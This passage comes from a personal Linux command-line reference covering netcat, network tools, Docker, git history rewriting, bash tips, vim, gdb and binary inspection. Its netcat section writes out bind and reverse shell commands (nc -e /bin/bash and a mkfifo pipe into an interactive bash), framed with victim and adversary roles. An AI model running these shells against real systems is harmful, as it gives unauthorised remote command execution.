  - `host4$ nc <host1> 1234 -c "<command> 2>&1"` to send the `stdout` and `stderr` of `<command>` to the listening host and close the connection
- Simple traffic logging
  - `host1$ nc -l -p 1234 -o nc-traffic.hex` to listen on a host and redirect messages to a file
  - `host1$ xxd -r nc-traffic.hex` to reverse subsequent traffic hex
- Simple reverse shell
  - Using modern `netcat` (with `-e` available)
    - `host1$ nc -l -p 1234 -e /bin/bash` to execute all received messages via bash
    - `host2$ nc <host1> 1234` to establish a connection to the listener
    - `<command>` from `host2` during the remote session to execute `<command>` on the listener's system
  - Using older `netcat` (no `-e` available)
    - Listener (victim, in a hacking scenario):
      - `rm -f /tmp/commands; mkfifo /tmp/commands` to make a temporary input stream that we can redirect to `bash`
      - `cat /tmp/commands | /bin/bash -i 2>&1 | nc -l -p 1234 > /tmp/commands`
    - Client (adversary, in a hacking scenario):
      - `nc <listener-address> 1234` to connect
- Transfer a file to another host
  - `host1$ nc -l -p 1234 > rx-file` to listen for connections and redirect the stream to a file
  - `host2$ nc -N <host1> 1234 < tx-file` to transfer a file and close the connection (`-N`) on EOF
- Transfer an SSH public key from client to listener
  - `host1$ nc -l -p 1234 >> ~/.ssh/authorized_keys` to listen and append the transferred key to `authorized_keys`
  - `host2$ nc -N <host1> 1234 < ~/.ssh/key.pub` to transfer the key file to the listener and close the connection (`-N`) on EOF
- Transfer an SSH public key from listener to client
  - Scenario: I needed to do this one time because I couldn't set up a listener (accept inbound connections from the LAN) because WSL was behind a NAT. Instead, I set up a listener on the machine that wanted to send, and had the listener send the file.
  - `host1$ nc -l -p 1234 < <(tail -n 1 ~/.ssh/authorized_keys)` to listen for connections with the specified contents in the stream
  - `host2$ nc <host1> 1234 > ~/.ssh/key.pub` to grab the contents of that file and redirect them to the proper file
- `dig` (a flexible tool for interrogating DNS name servers)
- `nslookup` (a program to query Internet domain name servers)
  - `nslookup 7-zip.org` to get the IP for `7-zip.org`
- `netstat` (print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships; use `ss` instead)
  - `netstat -r` to display the kernel routing tables (`route -e` produces the same output) (replaced by `ip route`)
  - `netstat -tupa` and other variations to see services exposed by your device
  - `netstat -pa | grep -i ssh` to find sockets/programs running `ssh`, and users/UIDs with established SSH connections
    - NOTE: Almost certainly use `watch -n 1 w` instead for this use case
  - `netstat -i` to display all network interfaces (replaced by `ip -s link`)
- `ifconfig` (configure a network interface; use `ip` instead)
  - `ifconfig -v -a -s` to view a short (`-s`) list of all (`-a`) interfaces (up and down) with additional error message detail (`-v`)
- `route`
  - `route -n` to see routes without resolving addresses to names (`-n`)
  - `route -e` to see routes in netstat format
- `ss` (another utility to investigate sockets)
  - `ss -a | grep -i ssh` to find sockets/programs running `ssh`, and UIDs with established SSH connections
  - `ss -ntulp` to find processes listening (`-l`) on TCP (`-t`) and UDP (`-u`) sockets, showing the process (`-p`) and not resolving addresses (`-n`)
- `ip` (show / manipulate routing, network devices, interfaces and tunnels)
  - `-br` for brief output (supported by `addr`, `link`, `neigh`)
  - `addr`
    - `ip addr del 192.168.0.88/24 dev ens33` to delete that IP prefix on that interface
  - `monitor` (watch for netlink messages)
    - Useful when setting up or modifying interfaces, routes, etc
  - `neigh` (show current neighbor table in kernel) (ARP or NDISC cache entries)
  - `route` (show table routes)
  - `link` (show current link-layer links between interfaces and MAC addresses)
    - `ip -s link` to show all link statistics
    - `ip -s link show eth0` to show `eth0` interface statistics
- `tc` (show / manipulate traffic control settings)
- Since Docker Engine version `28.4.0 d8eb465`: https://docs.docker.com/engine/release-notes/28/#2840
- See the Docker CLI reference: https://docs.docker.com/reference/cli/docker
- See the Dockerfile reference: https://docs.docker.com/reference/dockerfile
- See Docker Hub image search: https://hub.docker.com/search
- The `alpine` image is very small, making it fast to pull down and start up, and it has `busybox` pre-installed by default. This allows for quick testing.
- The `python:3.xx-alpine` images are typically slimmer than the `python:3.xx-slim` Debian images, but have fewer features
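As a sketch of how a tiny Alpine-based test image might be defined (the package choice and `CMD` here are illustrative assumptions, not from this reference):

```dockerfile
# Small base image; busybox utilities come with alpine by default
FROM alpine:3.20

# Add only what your experiment needs (curl is just an example)
RUN apk add --no-cache curl

# Drop into a shell for interactive poking around
CMD ["sh"]
```

Build and enter it with something like `docker build -t scratchpad . && docker run -it --rm scratchpad`.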
- `docker scout` (check vulnerabilities in base images; extremely nifty)
  - `docker scout recommendations` to get recommendations on the last-built image
  - `docker scout recommendations --tag <image>` to get recommendations for a specific image
- `docker network`
  - `docker network ls` to list networks available to connect to a container
  - `docker network inspect <network-name>` to inspect a network's configuration, including connected containers and their IP addresses
- `docker builder prune -a` to remove all image build cache
- `docker system` (manage docker)
  - `docker [system] events` to monitor server events in real time
  - `docker system df` to show disk usage
    - `-v` for a detailed breakdown
  - `docker [system] info` to show general Docker and system information
  - `docker system prune` to remove unused data
- `docker image prune` to remove dangling images (images not tagged or referenced by any containers)
  - `-a` to remove all images currently unused (without an associated running container)
- `docker [image] build . -t <image-name>:<optional-tag>` to build the image specified by the current directory's Dockerfile
- `docker [image] build . -o tempfs` to build an image from the current directory's Dockerfile and dump its filesystem to a directory
- `docker images` or `docker image ls` to list images
  - `-q` to list IDs only
- `docker [container] commit <container> [<image-name>:<tag>]` persists a running container as a new image
- `docker image rm <image> [-f]` to remove an image
- `docker container ls` or `docker [container] ps` to see running containers
  - `-a` to see all containers
  - `-q` to list container IDs only
- `docker [container] inspect <container>` to view a container's configuration
- `docker [container] stats [containers]` to monitor resource utilization for all or some containers
- `docker [container] top <container>` to list a container's running processes
- `docker [container] exec -it <container> <command>` to execute `<command>` in interactive mode with an explicitly allocated TTY
  - Use the same command without `-it` to execute a non-interactive command (one which does not expect STDIN to remain open during execution) within a container
    - For example, `apk --version` would execute, output, and exit, with no input/interaction
- `docker [container] attach <container>` to attach to a container
- Stopping containers:
  - `docker [container] stop <container>` to stop a container from running
  - `docker [container] stop $(docker ps -q)` to stop all containers from running
  - `docker [container] kill <container>` to forcefully kill (SIGKILL by default) a container
- Removing containers:
  - `docker [container] rm [-f] <container>` to remove a container
    - `-f` to forcefully kill (SIGKILL) if running and then remove
  - `docker [container] prune` to remove all stopped containers
- `docker [container] start <container>` (start one or more stopped containers)
- `docker [container] run` (create and run a new container from an image)
  - `-a` to attach STDOUT/STDERR
  - `docker [container] run -[d]it [--rm | --restart=always] [--name <container-name>] <image-name>` starts up a container and attaches to an interactive shell for the container of the specified image
    - `--rm` deletes the container on stop
    - `-d` starts detached
    - `--restart=always` restarts the container under all circumstances (reboot, crash, etc) except manual stop/kill via Docker
    - `--name <container-name>` provides a name for the container
  - `docker [container] run -dit --name <container> --network <network-name> <image-name> sh` creates and starts a container with the assigned name, network, and image, starting in detached mode running `sh`
    - NOTE: New containers are generally added to the default bridge network, `docker0`
- Container privileges and capabilities
  - See the docs: https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities
  - `--cap-add` or `--cap-drop` to add or remove container privileges and capabilities
  - `--device=[]` to allow a device to run inside a container
- `git log --diff-filter=A -- <relative-path/file>` to search logs for diffs where a file was added
- `git filter-repo` (rewrite repository history; external tool)
  - `git filter-repo --replace-text replacements.txt`
  - `--path <path>` to preserve only that path in the repo history
  - `--invert-paths --path <path1> --path <path2>` to delete those paths from the repo history
  - Dry run and preview:
    - `--dry-run`
    - `diff --color .git/filter-repo/fast-export.original .git/filter-repo/fast-export.filtered` to preview changes
- `git reflog` (manage reflog information)
  - `expire` (prune older reflog entries)
    - `--expire=<time> --all` to prune all reflog entries older than `<time>`, making them unreachable (`git gc` will automatically remove loose reflog entries when it decides to)
- `git gc` (cleanup unnecessary files and optimize the local repository)
  - `--prune=<date>` (prune loose objects older than date)
  - `--aggressive` (more aggressively optimize the repository at the expense of taking much more time)
WARNING: These steps are rough and not to be followed blindly. History rewriting is highly and widely destructive. Read the official documentation carefully.
- `git clone --mirror --no-local <local-repo-path> <mirror-repo-dest>` to clone a mirror of the local repo, which we will perform sanitization on
- `cd <mirror-repo-dest>`
- `git filter-repo --dry-run --replace-text replacements.txt` to perform a dry-run text replacement across all files of the repo (`replacements.txt` should have one expression per line)
- `diff --color .git/filter-repo/fast-export.original .git/filter-repo/fast-export.filtered` to preview changes
- `git filter-repo --replace-text replacements.txt` to perform the actual text replacement
- `git reflog expire --expire=now --all` to expire all reflog entries so they become unreachable and removable
- `git gc --prune=now --aggressive` to remove all expired objects and perform aggressive repo optimizations (NOTE: `--aggressive` is potentially very slow for large repos)
- `git push --force --all` to overwrite all branches on the remote repo
- `git push --force --tags` to overwrite all tags on the remote repo
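For reference, a hypothetical `replacements.txt` might mix the line formats `git filter-repo --replace-text` supports: a bare literal is replaced with the default `***REMOVED***`, `==>` supplies an explicit replacement, and a `regex:` prefix makes the match a regular expression (the secrets below are made up):

```
hunter2
AKIA_FAKE_ACCESS_KEY==>REDACTED_ACCESS_KEY
regex:password\s*=\s*\S+==>password=REDACTED
```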
- From the manpage:
Subtrees allow subprojects to be included within a subdirectory of the main project, optionally including the subproject’s entire history.
For example, you could include the source code for a library as a subdirectory of your application.
Subtrees are not to be confused with submodules, which are meant for the same task. Unlike submodules, subtrees do not need any special constructions (like .gitmodules files or gitlinks) to be present in your repository, and do not force end-users of your repository to do anything special or to understand how subtrees work. A subtree is just a subdirectory that can be committed to, branched, and merged along with your project in any way you want.
- `git subtree add --prefix=<where/to/put/it> <repo> <ref>` to add a subtree within a repo
  - Use `--squash` to squash the subtree's history into a single commit
TODO
TODO
TODO
- `alias`
  - `alias` to print all aliases
  - `alias <name>` to view an alias
  - `alias <name>=<command>` to set an alias
  - `unalias <name>` to remove an alias
- `echo $RANDOM` prints a random number
- `declare` (set variable values and attributes; for advanced variable declaration)
- `readonly const='my constant'` to set a constant variable
- `which -a <command>` to see all paths found for a command
- `> new-file` to quickly create a new file instead of `touch new-file`
- `.bash_profile` only runs on login (or `bash -l`)
- Always quote strings, prefer single quotes
- Script Suffixes (eg, `script.sh`)
  - rwxrob argues against using suffixes for scripts, such as in "my-script**.sh**", on Unix, Linux, and Mac. His argument is that a suffix reduces your script's portability by restricting the script to the extension's specific language (`.bash` for bash, `.py` for Python, etc).
  - Naming the script without an extension allows you to drop in scripts written in different languages or to drop in different binaries, especially as your project grows and you need to make changes to your infrastructure, or if your script could be placed in your system's PATH.
  - This is particularly important for larger or enterprise-level projects.
- `#!/bin/bash` vs `#!/usr/bin/env bash`
  - Using `env` in a shebang runs the first `bash` executable found in the `PATH` variable, if one exists. This presents a security risk, as a non-system, malicious `bash` could be executed. Hardcoding the default system `bash` eliminates this risk.
  - Choose based on your concerns. Generally, `env` bash is preferred unless security is of special concern.
- `source` vs `exec` on Bash Configs
  - Instead of `source`ing your Bash configs, use `exec bash`, which wholly replaces the current shell and resets all state to avoid unexpected behavior and garbage buildup, including closing all processes held open by the shell.
  - Tip: Use `exec bash -l` if you're updating your `.bash_profile`.
- Use `shellcheck` on important scripts to detect errors and potential bugs
- Use `set` with options to improve safety and predictability of shell scripts (use within shell scripts)
  - `-o posix` to run in POSIX mode
  - Some common options for safety:
    - `-e` to exit immediately if a command exits with a non-zero status
    - `-o pipefail` to exit using the last nonzero status in a command pipeline, if present
    - `-u` to treat unset variables as an error when substituting
    - `-C` to disallow existing regular files from being overwritten by redirection of output
  - Some common options for debugging:
    - `-v` to print shell input lines as they are read
    - `-x` to print commands and their arguments as they are executed
    - `-n` to read commands but not execute them
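As a small illustration of the safety options above, here's a sketch that probes `-e`, `-o pipefail`, and `-u` in throwaway `bash -c` subshells (all strings are illustrative):

```shell
#!/usr/bin/env bash

# Without pipefail, the pipeline's status is cat's (0), so execution continues:
bash -c 'set -e; false | cat; echo survived'              # prints: survived

# With pipefail, the failing `false` makes the pipeline fail, and -e aborts:
bash -c 'set -eo pipefail; false | cat; echo survived' \
  || echo 'aborted'                                       # prints: aborted

# With -u, expanding an unset variable is fatal:
bash -c 'set -u; echo "$not_set"' 2>/dev/null \
  || echo 'unset variable rejected'
```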
- `shfmt` (format shell programs)
  - `-i <indent>` to specify indentation
  - `-w` to format the file in place (instead of writing to standard output)
  - `-d` to error with a diff of the changes
- Some versions of `echo` allow `-e` to enable backslash escapes (eg, `echo -e 'hi\n'`), but it's not as universal as `printf`, so generally prefer `printf`
  - `printf "%s %10s\n" 'bob' 'alan'` -> `bob       alan`, with `alan` right-justified in a 10-character field
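A quick sketch of `printf` field widths (the values are illustrative):

```shell
# %10s right-justifies in a 10-character field (6 spaces pad "alan")
printf '%s %10s\n' 'bob' 'alan'     # -> bob       alan

# %-10s left-justifies instead
printf '%s %-10s|\n' 'bob' 'alan'   # -> bob alan      |

# %05d zero-pads numbers
printf '%05d\n' 42                  # -> 00042
```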
- `echo -e 'line1\nline2\nline3'` if `-e` is available
- `printf 'line1\nline2\nline3\n'`
```bash
printf 'line1
line2
line3
'
```

```bash
echo 'line1
line2
line3'
```

```bash
cat <<EOF
line1
line2
line3
EOF
```

- `list=(1 2 3); for i in ${list[@]}; do echo $i; done` to create and loop over an array of elements
- `var=2`
  - `echo '$var'` -> `$var`
  - `echo "$var"` -> `2`
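The unquoted array loop works for simple values, but here is a sketch of why quoting the expansion as `"${list[@]}"` matters once elements contain whitespace (the element values are illustrative):

```shell
#!/usr/bin/env bash
list=("one item" "two items")

# Unquoted: elements are re-split on whitespace -> 4 words
for i in ${list[@]}; do echo "$i"; done

# Quoted: each element stays intact -> 2 lines
for i in "${list[@]}"; do echo "$i"; done

echo "elements: ${#list[@]}"   # -> elements: 2
```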
- `echo {1..5}` -> `1 2 3 4 5`
- `for i in 1 2 3; do echo $i; done`
- `<(command)` executes `command` in a subshell context, does not preserve calling-shell variable changes, and passes the output as a file to the parent shell
  - `. <(command)` executes the output of `command` as a file in the current shell context
  - `cat <(echo hi; echo hi)` -> `hi` and `hi` on separate lines
- `$(command)` executes `command` in a subshell context, does not preserve calling-shell variable changes, and captures the resulting output as a string
  - `./$(echo sayhi)` -> `./sayhi` -> `hi`
  - `iam=$(whoami)` -> `iam=holychowders`
  - `echo $(echo hi; echo hi)` -> `hi hi`
- `(command)` executes `command` in an isolated subshell which does not preserve shell variable changes. Output is captured, but its use is limited.
  - `(echo hi)` -> `hi`
  - `echo (echo hi)` does not work (syntax error)
  - `echo $( (echo hi) )` -> `hi`
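A sketch tying the three forms together (bash-only; the values are illustrative):

```shell
#!/usr/bin/env bash

# $( ) captures output as a string
user=$(echo holychowders)
echo "user=$user"                     # -> user=holychowders

# <( ) presents output as a readable file
wc -l < <(printf 'a\nb\nc\n')         # -> 3

# ( ) runs in a subshell; variable changes do not escape
x=1
(x=99)
echo "x=$x"                           # -> x=1
```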
- `/\<word\>` with escaped `<` and `>` allows matching on whole words
- `/\v<word>` with `\v` ("very magic") allows matching on whole words without escaping `<` and `>`, and permits other more modern and convenient expansions
- `:help profile` for more complete information
- `:profile start /tmp/vimprofile.log` to begin a profiling session
- `:profile file *` to track and profile all scripts that get run
- `:profile func *` to track and profile all functions from profiled scripts
- `:profile dump` to write profiling data to the logfile
- `:profile pause` to pause profiling and write to the logfile
- `:profile continue` to continue profiling
- `:profile stop` to stop profiling and write to the logfile
- If you forgot to use sudo to open a file, you can redirect the contents of the buffer to `sudo tee` to write the file instead
  - `:w !sudo tee % > /dev/null`
See the excellent GDB Quick Reference by UTexas: https://users.ece.utexas.edu/~adnan/gdb-refcard.pdf
- `help`
  - `help` for general help
  - `help <command>` for help on a command
  - `apropos -v <word>` for full documentation of commands related to `<word>`
- `file <program>` to load a program
- `b[reak] [file:][function]` to break at the current line or at `[function]` in `[file]`
- `r[un] [arguments]` to re/start the loaded program with `arguments`
- `s[tep] [count]` to step into the next instruction `count` times
- `n[ext] [count]` to step over the next instruction `count` times
  - Press `Enter` to repeat the last command
- `i[nfo]`
  - `[b]reak[points]` to list breakpoints
  - `watch[points]` to list watchpoints
  - `locals` to list local variables
  - `args` to list arguments to the current function
  - `[r]egisters` to print the state of the registers
  - `address main` to print the address of symbol `main`
  - `sharedlibrary` to print the status of shared object libraries
  - `proc mappings` to list process memory mappings
- `p[rint]`
  - `<expression>` to evaluate and print `<expression>`
  - `<variable>` to print a variable
  - Format modifiers: `/d` decimal, `/x` hexadecimal, `/o` octal, `/t` binary, `/u` unsigned decimal, `/c` character, `/f` floating point
- `watch`
  - `watch x` to break when symbol `x` changes
  - `watch <expression>` to break when `expression` evaluates true
- `c[ontinue]` to continue running the program if paused
- `core-file <core>` to load a core dump
- `clear` to delete the breakpoints at the current line
- `d[elete] [breakpoint-numbers]` to delete all breakpoints, or only those specified
- `frame` to print the current frame
- `bt` for backtrace
- `list .` to list the current position in the source
- `disas main` to disassemble symbol `main`
- `x/10i main` to examine the first `10` instructions of symbol `main` in memory
- `ldd` (print shared object dependencies)
  - WARNING (SECURITY): Some versions of `ldd` may try to execute the binary to resolve dependencies. Prefer `objdump -p <binary> | grep NEEDED` when working with untrusted binaries.
  - `ldd <binary>`
- `readelf` (display information about ELF files)
  - `-W` for wide display
  - `-a` to display all information
  - `-h` to display the ELF header information
  - `-s` to dump symbols
  - `-C` to demangle (C++)
  - `-e` to display all headers
  - `-V` to display version sections
  - `-A` to display architecture-specific information
- `objdump` (display information from object files)
  - `-d` to disassemble
  - `-t` to display symbols
  - `-g` to display debugging information
  - `-h` to display summaries from each section header
  - `-f` to display a summary of the overall file header
  - `-p` to display headers
  - `-s` to display full contents of each section (hex dump)
    - Use with `-j <name>` to select a particular section
    - Use with `-Z` to decompress any compressed sections
  - `-j <name>` to display information for a specific section
  - `-x` to display all header information
  - `--start-address=<address>`
  - `--stop-address=<address>`
  - Example: `objdump -p <binary> | grep NEEDED` to see shared object dependencies
- `nm` (list symbols from object files)
- `binwalk` (search binary images for embedded files and executable code; TODO)
- `valgrind` (suite of tools for debugging and profiling programs; TODO)
- `xxd` (make a hex dump or do the reverse)
  - `xxd <file>` to dump hex for a file
  - `-b` to dump binary instead of hex
  - `-r` to revert a patched hex dump back into binary format
- `hexdump` (display file contents in hexadecimal, decimal, octal, or ascii)
  - `hexdump <file>` to dump hex for a file
  - `hexdump -C <file>` to display hex in canonical form (hex+ASCII)
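A sketch of the `xxd` round trip described above (the file paths are illustrative; assumes `xxd` is installed):

```shell
#!/usr/bin/env bash
printf 'hello, hex\n' > /tmp/demo.bin

xxd /tmp/demo.bin > /tmp/demo.hex       # binary -> editable hex dump
xxd -r /tmp/demo.hex > /tmp/demo2.bin   # hex dump -> binary

cmp /tmp/demo.bin /tmp/demo2.bin && echo 'round trip OK'
```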
- `toilet`
- `figlet`
- `boxes`
  - `boxes -d <design>` to use a design
  - `boxes -l` to list possible designs
    - Nice ones: `unicornthink`, `bear`, `spring`, `twisted`, `sunset`, `santa`, `cat`
  - `boxes -s <width>` to specify width
- `lolcat` (color)
- `cmatrix`
- `cacafire` (`caca-utils`)
- `nyancat` (awesome)
- `asciiquarium` (run in a Fedora Docker container)
- `sl` (train)
- `echo Welcome | boxes | figlet`
- `echo Welcome back @home, holy! | boxes -d bear -s $COLUMNS`
- `echo Welcome back @home, holy! | boxes -d spring -s $((COLUMNS-9))`
- GitHub repo: https://github.com/holychowders/linux-reference
- GitHub profile: https://github.com/holychowders